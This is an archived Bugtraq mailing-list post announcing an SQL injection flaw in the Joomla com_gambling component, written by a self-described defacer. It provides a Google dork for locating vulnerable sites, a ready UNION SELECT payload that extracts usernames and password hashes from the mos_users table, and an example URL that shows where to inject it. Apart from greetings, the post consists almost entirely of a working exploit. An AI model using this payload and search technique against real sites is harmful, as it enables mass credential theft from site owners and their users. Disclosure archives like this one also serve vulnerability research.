| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 1 Feb 2010 17:14:34 -0000 From: md.r00t.defacer@...il.com To: bugtraq@...urityfocus.com Subject: Joomla (com_gambling) SQL Injection Vulnerabilities #------------------In The Name Of God------------ # Joomla (com_gambling) SQL Injection Vulnerabilities ################################### #AUTHOR: md.r00t #Mail: md.r00t.defacer@...il.com #Webstie: www.r00t.gigfa.com #Forum: http://forum.aria-security.com # ################################### #Google D0rk: # inurl:"com_gambling" ################################### #Exploit: #--------- # -9999+union+select+1,concat(username,0x3a,password)+from+mos_users/* ################################### #Example: # #http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit] ################################### #TNX: #Aria-Security Team (Persian Security Network),Virangar Security Team *****************************************
Powered by blists - more mailing lists